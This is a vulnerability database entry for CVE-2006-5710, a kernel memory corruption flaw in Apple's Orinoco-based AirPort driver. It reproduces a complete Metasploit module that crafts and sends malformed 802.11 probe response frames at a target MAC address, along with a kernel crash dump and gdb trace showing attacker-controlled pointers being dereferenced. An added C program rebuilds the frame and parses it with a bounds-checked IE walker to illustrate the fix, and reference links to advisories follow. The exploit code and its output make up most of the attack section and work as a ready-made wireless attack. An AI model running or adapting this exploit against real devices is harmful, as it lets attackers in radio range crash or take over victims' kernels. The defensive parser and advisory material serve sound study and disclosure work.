Apple AirPort Driver Remote Code Execution Vulnerability

Vulnerability ID: 1111440    Type: Buffer overflow
Published: 2006-11-01    Updated: 2006-11-29
CVE: CVE-2006-5710    CNNVD ID: CNNVD-200611-039
Platform: Hardware    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/2700
https://www.securityfocus.com/bid/20862
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-039
|Details
Apple AirPort is Apple's 802.11 wireless networking product line. The AppleAirPort driver supplied with Orinoco-based AirPort cards (the 1999-2003 PowerBooks and iMacs) contains a memory corruption vulnerability in its handling of malformed probe response frames; a remote attacker within radio range can exploit it to execute arbitrary code in the kernel of the victim machine. When the driver is in active scanning mode, a probe response frame whose fixed-length header is not followed by valid information element (IE) fields is copied over internal kernel structures, so memory operations are performed on attacker-controlled pointer values. Probe responses are unauthenticated management frames, so no association with the victim is required; the frames only have to be transmitted while the card is scanning. Apple addressed the issue in Security Update 2006-007 (APPLE-SA-2006-11-28), listed in the references below.
|Exploit (EXP)
# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree:
# msf > use auxiliary/dos/wireless/daringphucball

require 'msf/core'

module Msf

class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary

	include Exploit::Lorcon


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
			'Description'    => %q{
				The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
				is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning 
				mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
				to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
				that does not contain valid information element (IE) fields after the fixed-length header. The data 
				following the fixed-length header is copied over internal kernel structures, resulting in memory 
				operations being performed on attacker-controlled pointer values.
			},
			
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3666 $'
		))
		register_options(
			[
				OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system"])
			], self.class)					
	end

	#
	# This bug is easiest to trigger when the card has been placed into active scan mode:
	# $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000
	#

	def run
		open_wifi
		
		cnt = datastore['COUNT'].to_i

		print_status("Creating malicious probe response frame...")		
		frame = create_frame()
		
		print_status("Sending #{cnt} frames...")
		cnt.times { wifi.write(frame) }
	end
	
	def eton(addr)
		addr.split(':').map { |c| c.hex.chr }.join
	end

	def create_frame
		bssid    = Rex::Text.rand_text(6)
		seq      = [rand(255)].pack('n')
		caps     = [rand(65535)].pack('n')
		
		# 24-byte management header followed by the 12 bytes of
		# probe response fixed fields (36 bytes in total)
		frame = 
			"\x50" +                      # type/subtype: management / probe response
			"\x00" +                      # flags
			"\x00\x00" +                  # duration  
			eton(datastore['ADDR_DST']) + # dst
			bssid +                       # src
			bssid +                       # bssid
			seq   +                       # seq  
			Rex::Text.rand_text(8) +      # timestamp value
			Rex::Text.rand_text(2) +      # beacon interval
			caps                          # capabilities
		
		# Pad to 1024 bytes with 0x0defaced instead of a valid IE list; the
		# driver ends up using these bytes as pointers (DAR=0x0DEFACF7 below)
		frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
		
		return frame

	end	
end
end	

=begin

Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006)

Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260
Latest crash info for cpu 0:
   Exception state (sv=0x3AA12A00)
      PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access)
      Backtrace:
0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94
         0x002CFA5C 0x000A9314
      Kernel loadable modules in backtrace (with dependencies):
         com.apple.driver.AppleAirPort(3.4.4)@0x797000
            dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000
Proceeding back via exception chain:
   Exception state (sv=0x3AA12A00)
      previously dumped as "Latest" state. skipping...
   Exception state (sv=0x31F13A00)
      PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown)

Kernel version:
Darwin Kernel Version 8.8.0: Fri Sep  8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC



(gdb) showcurrentstacks
task        vm_map      ipc_space  #acts   pid  proc        command
0x01a73dd8  0x00cdaf3c  0x01a68ef0   38      0  0x003fb200  kernel_task
            activation  thread      pri  state  wait_queue  wait_event
            0x01a7c000  0x01a7c000   82  R
                reserved_stack=0x173b0000
                kernel_stack=0x17440000
                stacktop=0x17443b60
                0x17443b60  0x1bc80ac
                0x17443be0  0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48>
                0x17443c60  0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54>
                0x17443ce0  0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94>
                0x17443d90  0x79febc <com.apple.driver.AppleAirPort + 0x8ebc>
                0x17443df0  0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184>
                0x17443e40  0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104>
                0x17443e90  0xa9314 <Call_continuation+20>
                stackbottom=0x17443e90


(gdb) x/3i $pc
0x7a2260 <mhp.1762+3571640>:    lbz     r8,0(r2)
0x7a2264 <mhp.1762+3571644>:    addi    r2,r2,1
0x7a2268 <mhp.1762+3571648>:    stw     r2,0(r11)

(gdb) i r $r2
r2             0xdefacf7        233811191

(gdb) x/x $r11
0x17443bb8:     0x0defacf7


(gdb) bt
#0  0x007a2260 in mhp.1762 ()
#1  0x007a1d48 in mhp.1762 ()
warning: Previous frame identical to this frame (corrupt stack?)
#2  0x007a1d48 in mhp.1762 ()
#3  0x0079fa54 in mhp.1762 ()
#4  0x0079ff94 in mhp.1762 ()
#5  0x0079febc in mhp.1762 ()
#6  0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196
#7  0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267


(gdb) x/40x $r1
0x17443b60:     0x17443be0      0x22424022      0x01bc80ac      0x00000038
0x17443b70:     0x00d43c54      0x0004ffff      0x01bc81f4      0x00000210
0x17443b80:     0x02275000      0x003d8000      0x004fa418      0x00365000
0x17443b90:     0x01d803c0      0x00033e88      0x01a7c01c      0x01a7c0a4
0x17443ba0:     0x0defaced      0x01bc8000      0x0227581e      0x0defacf7
0x17443bb0:     0x00000000      0x0227581e      0x0defacf7      0x00000001
0x17443bc0:     0x00000002      0x01bc81f4      0x00000000      0x00000000
0x17443bd0:     0x17443c10      0x01a858c0      0x17443be0      0x01d80d40
0x17443be0:     0x17443c60      0x01bc81f4      0x007a1d48      0x00000000
0x17443bf0:     0x17443c20      0x00008088      0x01bc8000      0x0227581e

=end

# milw0rm.com [2006-11-01]
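The following C program is an added example and is not part of the original page, the Metasploit module, or Apple's driver. It rebuilds the frame the module sends (36-byte fixed header, then 0x0defaced repeated to 1024 bytes) and a well-formed probe response with an SSID and Supported Rates IE, then runs both through a bounds-checked IE walker of the kind the vulnerable driver lacked. The BSSID, destination MAC, and SSID are constructed sample values. Read as IE id/length pairs, the padding parses as six oversized elements before the seventh runs past the end of the frame, and no SSID is ever found; the crash dump above (DAR=0x0DEFACF7, r2=0xdefacf7 at `lbz r8,0(r2)`) is the driver dereferencing those same bytes as a pointer instead.

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 802.11 management header: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2) */
#define MGMT_HDR_LEN      24
/* Probe Response fixed fields: timestamp(8) beacon interval(2) capability(2) */
#define PROBE_RESP_FIXED  12
#define FIXED_LEN         (MGMT_HDR_LEN + PROBE_RESP_FIXED)
#define MAX_FRAME         1024

#define IE_SSID            0
#define IE_SUPPORTED_RATES 1

enum parse_result {
    PARSE_OK = 0,
    PARSE_TOO_SHORT,      /* shorter than the fixed header */
    PARSE_NOT_PROBE_RESP, /* frame control is not type 0 / subtype 5 */
    PARSE_TRUNCATED,      /* an IE length runs past the end of the frame */
    PARSE_NO_SSID         /* IE list parsed, but the mandatory SSID IE is absent */
};

/*
 * Bounds-checked walk of the IE list that follows the fixed fields.
 * *n_ies receives the number of complete IEs seen before any error.
 * Every IE is a 1-byte id, 1-byte length, then length bytes of body;
 * the body must fit inside the bytes that remain in the frame.
 */
enum parse_result parse_probe_response(const uint8_t *f, size_t len, size_t *n_ies)
{
    size_t off = FIXED_LEN;
    int saw_ssid = 0;

    *n_ies = 0;
    if (len < FIXED_LEN)
        return PARSE_TOO_SHORT;
    /* FC byte 0: version 0, type 0 (management), subtype 5 (probe response) */
    if (f[0] != 0x50)
        return PARSE_NOT_PROBE_RESP;

    while (off < len) {
        uint8_t id, ielen;
        if (len - off < 2)            /* need both id and length bytes */
            return PARSE_TRUNCATED;
        id    = f[off];
        ielen = f[off + 1];
        if (ielen > len - off - 2)    /* body would run past the frame end */
            return PARSE_TRUNCATED;
        if (id == IE_SSID)
            saw_ssid = 1;
        (*n_ies)++;
        off += 2 + ielen;
    }
    return saw_ssid ? PARSE_OK : PARSE_NO_SSID;
}

/* 36-byte fixed prefix; addresses are constructed sample values. */
static size_t put_fixed_header(uint8_t *buf, const uint8_t dst[6])
{
    static const uint8_t bssid[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
    memset(buf, 0, FIXED_LEN);
    buf[0] = 0x50;                 /* probe response */
    memcpy(buf + 4, dst, 6);       /* addr1: destination */
    memcpy(buf + 10, bssid, 6);    /* addr2: source */
    memcpy(buf + 16, bssid, 6);    /* addr3: BSSID */
    return FIXED_LEN;
}

/* The frame the Metasploit module sends: fixed header, then the bytes
   up to 1024 filled with big-endian 0x0defaced rather than a valid IE list. */
size_t build_malicious_frame(uint8_t *buf, const uint8_t dst[6])
{
    size_t off = put_fixed_header(buf, dst);
    while (MAX_FRAME - off >= 4) {
        buf[off++] = 0x0d; buf[off++] = 0xef; buf[off++] = 0xac; buf[off++] = 0xed;
    }
    return off;
}

/* A well-formed frame: SSID IE followed by a Supported Rates IE. */
size_t build_benign_frame(uint8_t *buf, const uint8_t dst[6])
{
    static const uint8_t ies[] = {
        IE_SSID, 4, 't', 'e', 's', 't',
        IE_SUPPORTED_RATES, 1, 0x82     /* 1 Mbps, basic rate */
    };
    size_t off = put_fixed_header(buf, dst);
    memcpy(buf + off, ies, sizeof ies);
    return off + sizeof ies;
}

int main(void)
{
    static const uint8_t dst[6] = {0x00, 0x0d, 0x93, 0x00, 0x00, 0x01}; /* constructed target MAC */
    uint8_t frame[MAX_FRAME];
    size_t n, len;
    enum parse_result r;

    len = build_malicious_frame(frame, dst);
    r = parse_probe_response(frame, len, &n);
    printf("malicious: len=%zu result=%d ies_before_error=%zu\n", len, r, n);

    len = build_benign_frame(frame, dst);
    r = parse_probe_response(frame, len, &n);
    printf("benign:    len=%zu result=%d ies=%zu\n", len, r, n);
    return 0;
}
```

The check that matters is `ielen > len - off - 2` before anything derived from the IE body is used; a driver that copies or interprets the bytes after the fixed header without that bound, as this one did, hands attacker-controlled data to its pointer-handling code.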
|Affected products
Apple Orinoco Airport Driver 0
|References

US-CERT TA06-333A: http://www.us-cert.gov/cas/techalerts/TA06-333A.html
CERT VU#191336: http://www.kb.cert.org/vuls/id/191336
XF airport-driver-code-execution(29965): http://xforce.iss.net/xforce/xfdb/29965
BID 20862: http://www.securityfocus.com/bid/20862
VUPEN ADV-2006-4750: http://www.frsirt.com/english/advisories/2006/4750
VUPEN ADV-2006-4313: http://www.frsirt.com/english/advisories/2006/4313
SECTRACK 1017151: http://securitytracker.com/id?1017151
SECUNIA 23155: http://secunia.com/advisories/23155
SECUNIA 22679: http://secunia.com/advisories/22679
MISC MOKB-01-11-2006: http://projects.info-pull.com/mokb/MOKB-01-11-2006.html
APPLE APPLE-SA-2006-11-28: http://lists.apple.com/archives/security-announce/2006/Nov/msg00001.html
Apple KB article 304829: http://docs.info.apple.com/article.html?artnum=304829
OSVDB 30180: http://www.osvdb.org/30180